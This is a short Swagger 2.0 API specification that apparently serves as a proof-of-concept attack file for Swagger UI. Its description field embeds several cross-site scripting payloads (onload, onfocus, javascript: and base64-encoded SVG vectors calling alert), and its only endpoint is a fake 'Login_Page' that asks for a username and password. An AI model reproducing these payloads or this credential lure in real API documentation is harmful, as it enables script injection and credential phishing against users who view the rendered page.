swagger: '2.0'
info:
  version: 1.0.0
  title: 'Swagger UI'
  description: 'containers: <body onload=alert(1)> <embed src=data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMik+> <object data=javascript:alert(3)> <keygen autofocus onfocus=alert(4)>'
paths:
  /Login_Page:
    post:
      summary: Login here to continue
      description: Please provide your credentials to continue.
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      tags:
        - Click here to login
      responses:
        '200':
          description: OK
        '400':
          description: Bad request
        '500':
          description: Server error
